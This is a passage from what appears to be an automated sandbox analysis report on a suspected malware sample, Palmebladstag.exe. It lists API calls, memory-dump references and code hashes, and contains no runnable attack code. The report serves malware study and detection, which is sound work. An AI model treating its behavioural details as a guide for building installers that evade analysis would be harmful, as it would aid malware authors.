                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022DD
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseDeleteOpenValue
                                            • String ID:
                                            • API String ID: 849931509-0
                                            • Opcode ID: 2712e1ab7f86f5c0bdc4e7c59669299d62410b951292b8cbe6235cc53d9de6e3
                                            • Instruction ID: baeefcf9a9db1f94083355b6d21ea7a3e6d609a59d1c11f41be6f028ad682588
                                            • Opcode Fuzzy Hash: 2712e1ab7f86f5c0bdc4e7c59669299d62410b951292b8cbe6235cc53d9de6e3
                                            • Instruction Fuzzy Hash: DAF0C232A00114ABDB10BBF48F8EEAE72A89B40318F10453BF601B71C1D9FD5E01966E
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 00404F66
                                              • Part of subcall function 00403ED3: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 00403EE5
                                            • OleUninitialize.OLE32(00000404,00000000), ref: 00404FB2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: InitializeMessageSendUninitialize
                                            • String ID:
                                            • API String ID: 2896919175-0
                                            • Opcode ID: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                            • Instruction ID: d474321d01a6e1a1f3848ce65de0e77d4b030d2df71d63d9074073521acdc131
                                            • Opcode Fuzzy Hash: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                            • Instruction Fuzzy Hash: 56F0F0B3A042028AE7015B58AC00B1277A4EBE4356F06803EFF04B32E2C77D9842876D
                                            APIs
                                            • ShowWindow.USER32(00010414), ref: 00401579
                                            • ShowWindow.USER32(0001040E), ref: 0040158E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: 412f5e298eb170cb7fcc89f841d8dacd8d6f34ad5613d5e8b54fdb80a1df1348
                                            • Instruction ID: ee0513fff25cb1769eb447bdd8d815014c6f46c9afdd248f46aeede14d5c0a9d
                                            • Opcode Fuzzy Hash: 412f5e298eb170cb7fcc89f841d8dacd8d6f34ad5613d5e8b54fdb80a1df1348
                                            • Instruction Fuzzy Hash: 95F0553BA082419FD700CB68EC8086E7BE1EB8630171885BBE101A31C1C2B86E00D718
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: 5aae167206b64cd9be2771cb0ee701594e2dc9245908d46d7aeff621b3f720f8
                                            • Instruction ID: dacfe0cc3fa15e7f928c0b82e119a982ce74a601eef441543fec6a70ee28c1de
                                            • Opcode Fuzzy Hash: 5aae167206b64cd9be2771cb0ee701594e2dc9245908d46d7aeff621b3f720f8
                                            • Instruction Fuzzy Hash: A9E0C272A04111DBCB10BBB4AE4AA6E33A4EF0035AB104437F202F10D1D6B99C80966E
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 00405829
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                            • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                            • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                            • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,?,00405418,?,?,00000000,004055FB,?,?,?,?), ref: 00405805
                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405819
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                            • Instruction ID: 6d681c681930d85979444900a1e0360634b6b339d8094e813ed74f59869d7b9d
                                            • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                            • Instruction Fuzzy Hash: DED0C972908120BFC2113728AE0889BBB95DB94271B018B31FA69A22F0C7304C628A99
                                            APIs
                                            • CloseHandle.KERNEL32(FFFFFFFF,004033A9,?), ref: 00403553
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\, xrefs: 00403567
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\
                                            • API String ID: 2962429428-2918387764
                                            • Opcode ID: 589a16cc77adabca8de4aa73762697773acad4ee3cb03b9089ecdffb6a6655dc
                                            • Instruction ID: fc4578a4b6b7db8cc3d98c31650a0345e59194aa90dc0d4e26b17281c046a7f9
                                            • Opcode Fuzzy Hash: 589a16cc77adabca8de4aa73762697773acad4ee3cb03b9089ecdffb6a6655dc
                                            • Instruction Fuzzy Hash: 91C08030604600A6D5247F7C9D4BA453A945741336B904735F475F50F3D73C5BC5956D
                                            APIs
                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: ad3191807828f4b9c2eb3a426ca5b21e981a6fc8c6d6e376c4745a7f563a4665
                                            • Instruction ID: c31469945a4911ea426e3239a307804724141ef2c1121085379b225132293f7e
                                            • Opcode Fuzzy Hash: ad3191807828f4b9c2eb3a426ca5b21e981a6fc8c6d6e376c4745a7f563a4665
                                            • Instruction Fuzzy Hash: 95F0E931B0811593CB20B7768E4DE5F66A4CF81328F24473BB111B21D1DABD8602596F
                                            APIs
                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                            • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                            • Opcode Fuzzy Hash: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                            • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,00000004,00000000,00000000,00000000), ref: 00403089
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                            • Instruction ID: 0981d36ce8a37324ca65ea29ac33eec068edb21049201a101882ec42e2df6d76
                                            • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                            • Instruction Fuzzy Hash: 3FE08C32151119BBCF205E619C08AEB3B5CEB007A6F00C033BA18E5190D630EB149BA8
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                            • Instruction ID: 2076060dfd2ee921fe50c9635413a5f0d56a6b8cd73322b3d01e2a4deb0b2e86
                                            • Opcode Fuzzy Hash: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                            • Instruction Fuzzy Hash: 39E04F76250108AED700EBA5DD46EA57BDCA704704F008021B608D6091CA78E5508B58
                                            APIs
                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
